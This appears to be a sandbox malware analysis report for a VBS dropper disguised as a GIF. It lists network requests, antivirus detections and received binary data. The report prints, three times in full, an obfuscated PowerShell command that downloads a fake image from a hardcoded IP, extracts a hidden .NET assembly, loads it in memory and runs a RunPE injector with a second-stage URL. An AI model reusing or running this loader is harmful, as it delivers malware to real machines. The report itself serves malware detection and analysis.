Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 4, 2024, 4:56 p.m. | July 4, 2024, 4:58 p.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\profilegoodforinvestreturntogold.gif.vbs
3044-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')"
2292
-
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://91.92.254.14/Users_API/syscore/file_fdncluho.ggk.txt | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://91.92.254.194/imge/new-image_v.jpg |
request | GET http://91.92.254.14/Users_API/syscore/file_fdncluho.ggk.txt |
request | GET http://91.92.254.194/imge/new-image_v.jpg |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')" |
cmdline | powershell -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')" |
Avast | Script:SNH-gen [Trj] |
Kaspersky | HEUR:Trojan-Downloader.VBS.SLoad.gen |
NANO-Antivirus | Trojan.Script.Vbs-heuristic.druvzi |
Detected | |
ZoneAlarm | HEUR:Trojan-Downloader.VBS.SLoad.gen |
Varist | VBS/Agent.BNM!Eldorado |
AVG | Script:SNH-gen [Trj] |
Data received | D^àÍ× *»¥Ùµ'Ò8ÇÆ·û^UÕ]H,^`&û!äSgõ«kÝ&iN T ªíSÅÀâÚåÙ3¸ßBÜÎ}<Èhîã\ Wðí³BHOÞ½*ux/2u?f]!=+ÊÎBî^6:ßRHÍ°;+ç?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ nÄð)÷£wUϯé|ZIôJ%hö²¼Ð6 gË¥y{,Çi%{{V{³<ÌcÒêc@Qgó¯åêàÕT+庺°aaèAøæ«jÕ5:e[Ä2·á<uç¾Ù¨²Ã§H¤UÚYNÂ6óÁ¿1¤UµnZÈàû|O~GljmãmÔ`åÕQ|mès<ê1QÅ pOªQ¤TU¢NãÀ®üfmKøf§a&µ#ñpsó¾®5û¬òï£Ùõïû] & £wde&þþ¿®|W,oáò!p®¬ {àbl n1Ý3»D9³|y¸à1e¦-^râ2ÊmE¬¨5;è©Ô$ADYN<µXöZ<WL¾âþc8àô:Ö\¾ÄÎùàB&àVl#ª-T Ä)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U}$cºö¿¶:tÓ<Q<`3I·Óé/¡Úw6949ù]ðé&5fShÌ~EIü? ]jiãÓÞÕ·3qék;x±føºäñÒ:1UônfÚY÷"¨P:òóÓÎ"ûÉØhÛWp<¹[qm¯´µí?Í?®ÖÅ<k{v¨V{¬ <Wÿ |è?\]&0ȱ±Xî2;(b^)¯Ó$ªãÂ]TZæ1ªcÇ#¦Oâ $²¤VøÚM!;Oá¬2ͧ×/RÚ8£l}ðÖËÂH>-²Ç©î2uz)4úÔ´wÃW\*`tïd c ËyrÚ ÑàU':¢Á$_éðý襤nü9 ¤5X+ÀKY¢ÒóY\4 Æf¤ú^&þl0ÍçØÑ*8<ýÐK½HSÐQÁ7YüÍ3ü&ÁS\p)3Êà vçÚ'r¡Ê:äù/±ÑÕ×>ø2ùÊÈHP£¯scb¹±.F¯¨Á$e% °*z® *IM±J .¯ÕD Ù 7Ᾰ}##H m¶l6¥Òfm"ºà¼7LñyF»¯ü0jxÖ· Ù+¸úcb$gT2ícÒ*ï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±B)(£pjq5± µW =²Vz-~¢EÀÐETDíÛ¾fO¨BÎ5nººçVÞö ñW|RmÌ\LÔIíTUT±VïlD#vÖ¯â aâT@©v@«÷Îbâè©^}¨E.Þ/¹ÍbñíUµ4lSHªC(#hç'FÑI Æûo|$vdì¤^bÓÀåå$éÅbmb» Ìxq6äa¾¯B&vQD ¸Å 2~#5¤³'âKãÔí$ÜO@p3ë:±¨ôþl[¢;à¤Q»é<Ë*H"ÊÖVue¨ß?<¼jOE'é>¢Ir.át(H'l¥`YÈ,JÆV³«'È»Ü-Õá*¤À Ùúaô˽É, íY£0Ë°úã:Wvu ÿ ¶mC»m`¬Êh s««ìk ÛRÉÚC®»ãè06f@ÆÑ?\ÏE*áð¨ o?ÒS®Ô/ åËDÖ 04Õáã$ bÁXÐ=f4Ë@]0ê$.P°0q6¢BÔ@ s°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏÅÜò1¨¹iTÐøpU-êøwÇbZ(á[dÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ÓÊv©<^ø5)*òAàbí©DpÀ |
Data received | Èâû·5þò« X·Au¶½ñß ÑÇÆU¶Ôÿ C× Ú<,0»`-È?3À÷÷÷Êê%e < Uo5·°ãj ^ Õ¤×ID ÚÛj:ÖºtËê¾ôÚ]-¸3»Óק¿J¬y5:h¢eÒÄk©Æ<Xfñ4ÒD»uÐá"ÒéUi¡15Å,Ãø«§~âò ÐéÖYõ,IW+jÕt¬Âôí¨P±Èò*ÕZ7}~X/ðÉ%A$p©Ðohâf ñ x|ÓIȪª»¯ï-*éõdiõª«y©»}Ð¥Ú}èû~XÔé>éá{ãÓUA\Ñ-CÏ¿ló¯sëa@²/Ä0cTxéËÄ`Ó<.ºåýÛÄ© Ü@9ç<eV/Q¦R`ä« ¾8àdká}>© sÿ vH^Ü^ FVXM»EuëÞÿ \íK¼²våKòk&XZ:;OnßÀ"ÌãH" °$צ9M¡, 1¼Fý-T Y¬F0ü)iKn"¨fJ&¡õ1n ÊÅcb»¹ä×Èàz >M?,ò£[Û©»ø{ã#ÃãÓitf&3;Xî°ãЮC<Sà &²!mË©f dU@]/®_ÑjeQ&¥ZYuf ;Òúm-·Å`5öI§}+iÜHÊò#$tK 0"èôúâ³êôúÝ:¼ÚIc(*ª6àZÝr/iàÔ¦´èVò<*±FZBKnà®*Ów{À4jN¶,j¶ª2¹B¶ÇáÀcC«Ñ¾ªãPJÆû¡Wq¦çh^Oþùe}%:i@¢9UE o#o^Þ áï<˪vu$WP6nÑø»u¯O¡}tÒê¢Hå¦)bà§¢Þ 43ù(SZ@Ìh Oû¹¦ú USqD §eÙEí³êÛùàeðÔÌJ;Ḧ+ÇÔ^fê×S§ÔG²ÓË, «p¨¨¯ üR}>·Å4ÚURtðƦBª¡Ú; íKáqieFD5,£ÔAP÷±ú·M³G©wmpUªo¸?Ï ¨ÓM¥ÑùXI3Røj©<}ð4ðs¥Ë´,0tkV15XÙÐnüà¢ÖxxY®ÀÑ+©¥=?wÇOaý3"9uÍQI¼H,H¬UFeA<"ðèò4qéàEi5» £Ö¦É^Ä{÷ÀkA'Úû©@IܸµÛðö9²!áùJð4;£°Ë`ZÚ6]ð¸éè|%Ö9b-÷L¡k, ¬qxµ¦³Ä Óê"YeÚÖB¸òðKÒ2¼JÕ¨*¹;½?/â9Óë<ã~T ª æ _O~pk£M32$±ce1fÒT¼ûçPЬAb]TÎÁßu PÕuÖC$¦4.5J_XmÆÏOOüq)u:gbÁ ¸.ÁË$2êg%\òÊNÒÂú×(´O4jÊ˵|°^µ]NtÂ#Ü0 èNò{ôÅ LËu êÖd¡öÛñ)Aòøî Ü{àeE3 `ÁI;àkhüF 3¤Ê, Êè¤ZÇá pW¶?£I<-4}GKÅ+m<À},VõéiURoe«Íþ-¸Tp²(& 0òÀÓûþHägYAÍÌ7§5}¦C«dVc¤*îÉ yàѯb gË3HÉVSaE1`~Df¯Hèuk3Ä%We%KmUR¼Useÿ {À§[¥VÂX¶æYFÖõ] ^¼ßlZ]f-n< Sæ:ú¹zúO³vÄàój# w8FµU=ÿ ߬VMvª'BIve r j÷ÿ GØõ§]ù2necÅ)£Å|ºàæñáU5ÜE(ë\éÏØHª¹µ$u÷øñ:¢èQâìP7ÇÇo¾GCµ+V·DYv<ækmãpÒÎ&TfÕvüÓ ~À÷eà`£ ÜT×¾X(`5Þ²¥úIà~HB½«¾ÑÐ`-8t.\_n×ïH¶¡ =ÎPJ"£Ï$]û~X"_GñÀcp+Á`kq¦A !$®â@°¹hR7Ó1ZÝé¢i@ú0O壷)æò 5f$éG§Ór)4<{ä±Ó´0ÍØ¿H×N]l~®¿LøôÕac_U¡9ªºX²`Ù!@SiG¯§BÞZBÊC.ÖP¢~p/˳1mÄ3E"À¡ÛÛdB¡J'K°/ ÎÝÝP,l ®w*>¢j¨ÏË"9"v ôl,pèXªP6Á.Ñw·ê+*Ú ¯rv1ê6pIܳ3Uµ~7fÜ -nïyXáwP ª²XØ øaOq9Gµ6ÜówíÎLæXc47*·8º Ð:^:4µ b)°o¤tùwŵZvGe½q«÷=°ð^<EÇ4Pôÿ xbSÎ&Y;ËQì ¼{À=Zùq×ÜvĦI¨mFrÊ( ñ¾ó´¯¾^ `¢³Ó-I@*¶KðëÒÌé)%°¤ø©}½þ£0e Ú(VP kåY· <ç ç¦PmÚoñvÀ¾ci}|Ãß&Y¨U hs}Éþ¹_\OÈ*ÃÜ_Ç* JÁUß L ¤Ná[j¨_.F#Õ]½±P®p'â/éWQNරAÜMY·O¦ÅÚÁ¾k#s0 O¦7åF$U*[tÅ,`?¾UR7Tp-¬Yä*ýpQg®]¤ d¯$ >2Ç·vÐŵÀ Ðý0D Q߸@©'h}s¼ÆB«Dbz÷âÿ I T° zõyqO ¢Áõ1äPøà. ¼ ¬ -G¯«¾ÙGZ<Ï`2´Tû @ 7X±³ùa},+8«®9U ªI`Zàs\ ¹o&6óO§Û4cÔBºeYþ»ÿ U¥c"À,ÛoÏ.&Ü V®?õóÀ9f2n@" =M'^}¬LåîÇ%ØUíH5Ý!!j÷ÈhţߴYGâe!GÈwùà"ij¸0 è0ÒnàìÚG·?>ª2ï[RAª'ãåXI¶N÷ò¥Z«<wÀ/1X IQ¸ViŤ$ 6±Æ¬óéi+ Ì«êcÒè~Xù¼ùÉ<¢·_¦ ´Lº}MÈl ko9èt~"$MzyåóD`]Hsð¼ÈÒ@RC¨»ÚÕÇ=O=/6H;r*,³è[ÅñE{õÀ&I©¥Ûº6¶¼EÚ]ÊC1!WåêëuÛ NKiü©N£Ôª¨Á°<]uö±]:ÕÑhu¥?{´úV²tPTôRhtï×=I¦Ò¦Í<K¾ª9?3¥ðor©!AÊRª ໾¹Í¼:m4¡Qn&Zf*ÍÙzöëÿ [ÔV!Ôm°xµí<ÊQ¤±GO=°/§pðï ¿¼³¡ÒA~ ²§úwÁEÒ(2O1¡ëó?ÏhQFªa{oþ¼ iÙÜ äÑmÇç ²¨#§Po¹þ¼h¡þ¢ÊIç©ëïÅ ¢Ã×èÕm[y±ý«}«:ÿ *hñyõ¶?h#û;öv}I¯4®ÔRz3òö¯Tú½\Èij±bN Lk}NpGvË^pÀ$HuVýý>/âãŵ)ÿ fÒ°*~&íùuÏxê|gÅ ÐéI\(?\}ð-7ÙïÓè4諵ö·5rNÀ eÆTgû]ö¿AöKÂU©pe ¢ÔÍý¾8ö»í~춫RÀÊÀ¢ÔÍý¾9ùíOÚýÚ|ë^Õ*;ûSö£_öÅdÖëd,XÒ(>^ÀóàÃDØ(²N{O²?³Ýgj#r°_,Fh~ξÏxW³ë<OR¨ÚƯ>¡/Ûß³ÞÝô![h¯HÀõ_eþÇøÙÝ"¬Q¨zå«mn·T|+Å¿kºéË&6/cC_öÇƼ@3RàÀà~×ý·ð ;õ(Hìxÿ ý°è ܺe.F|6Yõ3±2HÌO¹ÀÈåÍ|ð>âµïÔu½³ÌxÛñD àÖ`*3~ |
Data received | K,ë V-º%³×à æÏ"¹Øäð¼Üû?©Lé+væ]ÄWÅOlKÂ]#*h+í_LÌñ½n°é eÚKÓ5n$À^ Y^Ò¬ÔbÙU0U°kõùá¦)$%YmÀ!J |j°1c}[F°j4m;´¾jj®+åùmSTÞS»V$$Å ´W$ ¾PÎÂÊñùV}gÜÜI0°ß¨¾¼ÿ L ¦ÑëU ßL±1h>6·¢@àíM¯Ä<?ïAZÕ¤!¬³ÜÐóÊør¾² n¢0tÓ4ìÖ+( ût¿Ï3ü;F4úÅieÔ(±jQÓ¯Cÿ LKÈ%gYIõP«<sA{TFâ.¨I[Ò¦E [Û b³Ï3<k© ± Ëdd{¯®ðH,äj¿Ó. <ÔWCX¢$ÚU*-°Úª¼üJ}ðZMNÍd¾cÌÉS¢µS^|¬¦¸$È(UU¿Î±P27ºïÓáq¬®:Õ¯pG¶7©;ºm *ëUÓFÌ´Á«%²º-sȲQ³²ØµØôéøÚ<;µr*©bfÀsé%Òë4"M9/VÜÅÝ|:`?¢êTèVAQÍã¡Ì=\ª²0-I ·Z¿úcIâZ ²",h©û¸RAÒÈ÷ħ.\3úæéÔ×úú`3¦(Pº mѵ µå°OWçÐiWQȲ,ØQ ÐüâP;iõ7-#:: -O&Èã¾Lú¨"ÄhK+U^£:FcG,* eõ)¯©ý±o;O<$h%gÔ³~¯çǪwY#Fv¸Q±H¨=É÷÷Êh=$gL®¬ j±èpS¨ Xò<¸ÕÐSèRh^yøõÓÏ$},j$f6Tª½ïÙ×ø~}hy÷qíw¥NÕèÀS_$X`£jÖÑÓÐøf6)*~7»M8ÿ ]0Ðè ÓølÐG2´ªÆÉâÁùfU6À7v ¢»sÔ$z=ï?vßhÚýdy÷ç'P¡KUÐÜ¿Â?Ю»AÑÉ)^7DæphµºEo1YlnVk² `M§¡Mç=l|3S¦Oҫ©s+FÊ-léÞñ¹QBbHaÈÛÉ7ߤðÆUBêErÅO+ðÉÕêJDÀƧQ»jª±mÜ)±ÇwôÀFxãÕN4ªÔíu_:ÅkD@ô©íîo§XÔlDÔÔ½NijtHP+´ENÚÀÄ×Çÿ h \~ìÆÒQ|ns(Äå*5nö9êµi¦X"S¦U¤3U ÉúfÝVw×p4Å{'ÛÆÈÃy®;c¥¶PñR£Z÷»Ç5q$GÏ6(¤WMÆÁÓ¿\\E4í;Æ´ )ìG_ï(YÎTU}tJÝò=¹Æ¼3M¤'Q&²}±Ä´»ÔI= 4N°Êó"þ"ܺí-$©ÉþcÔQì>itzK¼ÅÕ¡P J©ÕgM rÈÅXªÆî=`¤Òü»^)i¥iâIôûX±Ív5ZÑ£o8¸*KnaøO¨ØØ|A#O¹HYXЮµßòí©c hw1Ubù¡ÔUeµ/jXC(ÔF«Ç¬uë×®hn² úª¸¯LÉ£+4.$äuPA«úå§Ó4¢(å (Ü̾hûr0¦+tÔ<Jßââè×±?²NÖ±÷6íÎUoÒv×oLÐÉmqÏú9@Sß¹ÍÍN\CR¨"Ôn<1_\ÈÎÅu®NÚ<´·^=²FQ ¯°ú=Cé\Èù¯ Ëj&Yì l·C® r¸RªÌ¤µúäHËV þyv-(&Z¶ë)¥y[t¸àydFcÆBX.ÎÁêkþX"[sØ{d« y{äjÜHþ¹[n$_Ô,UW¾ë [Ë1¾Ø AÙ$ÚÑ=MàYäÝËQ²Û-þZí~°×òÅk/´¨ÝÛÕÛ>®¦ó 0pWA®}ϸ,9$2æ)T-£~ðz==GõcQcæø¶½½:_<×rqó¬kî¥v]¦*ܬnp«-Öð5|'¯?ófAãò¯àrK ^ã¾d' ùÁ±XÅ,¬«¡¤ôôÈÜO·å!vB ú\+#¯5Å]}p6I?ËòÊßfw 3B ®CmÚ*ï¿·ÓA±2ÄòOì0@@NM<F®À nøû`^&M£s¨£`AýNá¸92Cnàþ_´q§Ê¤3²-D µürçHÐ+ ( ×$¨$ò~8 óPÏñlµ BG>\jê3 ë`¦û«° »Oévàxz8±Ó }ÐQeEÝñ¸ÿ \cÜ7sÎê¯Òó ÓbÔ¢ìÕÐýð cMí"üVæ¼q÷A i`Üô£ùfò Z¥{U4Eî4y¾Ã0Vve®()¾·ý°%Ù$ÌëePÝÞ¯¶[OvIdcµ» R;Ü_G£,ì ÂÛºÖè· v÷ÀèÝ"ãó!RÂøã°Æ4Ï#«yÈÞîI×O|OÈ rÆÀÛt°:uï#xÔÛ$ õߢ³¾vó[¶æ>Úñgr¢¯'¥f,di5ED¬BµR }p²<µ»¯îȵVj%aÚÅxy _ïÓ*ëì7È¿ùW:wdHÍXì)TqÇCèôQ»Ì®¶ )¡ÐwÀA4¥£2þ'±|ö¬$H\öäþ¼c^%mHf$(U[úÊG¥_+~õº$@èkÞÿ L4¥Öj õp íࢩ$óæó#LÊ¡HÝb¯ÞÆoE¤¶òÌÍÝc}(I£ < OE ÏaöwMZny Ñv6O9çtHU¾ýsØxafÅ·¨Ç#]ÂÎ@,c¥r¢v®{a¢]ÃÔ9^+å,s¢ÐmaÓ/ð!éþx·ø¬>I7«¸À§øÆÀü.mL¬ªÔYWüM¾Ñx´þ1â³jfbK1 vè>ÚýºoÖ]ËGóÏÚ¨Ù*à NV¹ÆI׺¨àM§}N¡!K;0P~¦ý}ì¯Ù´Þ£ï3 ò±A®!+ý}GvûCâ`G¤ËV#©ç°ÿ ]3[íçíY¤ðßq° 2ÿ LCûAý©é¼K&Ãe×[ãóÏÏí~§ÄuO¨ÔÊÒÊìYreóµ³4å%Jø|Ñë¨soKÅ÷Q§ Ì?Ìÿ lÓ|¤T=T5ðÀq#Û¥r84ëéãò|7]"5¸ewp·_®)£#!è²ðx^6¦2ð2z4~ë6*úÝ6è5jc<0 aóÅüHÀÉçk&þâQ¶þwÏúãÆPbÐ'÷c øÍÍïû_$º¤h4ñEÝ¡H(´ Ì÷ñMoW¥*Ô |Åÿ <r1¯#I1w×#_ 8Úß16áæΡo _\þÍ# '´([øÝäx|/êVV£ÿ Êë|WM¡ÑýÏI{º9«êI÷Å~ÏjxÓâ0=XÓ¾ÐÏH¤[=Ç¿Ó,à3ÊÜQ´Ó©\Ë!4XþïjÃ4éí@|;àyóÿ Úº1Ä(6ãh÷¼P}ðZ FŤwñ)X0£·ÿ (Ä?øÏÞXñ£l~£}B!iTv¿ê~¹&FDg$R5Ä£cEXðß_Á´.þêOjÁIâÚæ1èÒNÕÜÄ{â \jºè rZ2Q@äð¸Ä¾ö¿s#lÞw?¸n6ÀØÅõ0ɳWáÞ×k~}>Ätáã`ó ûó±x&!§Ôò¯ÒÕf3ðø{¨øÌ^"þ©à 8*ëØýp#Q¥ J:¼89m>}Aô¡Uÿ ¿·G¨ e2ªn ín£Ôx C·JMÍuôp4>Êxñ}^¿áãð6{ôôÚÐ #ñ±Æ|ûìÔþ)Ú=4L¨W |
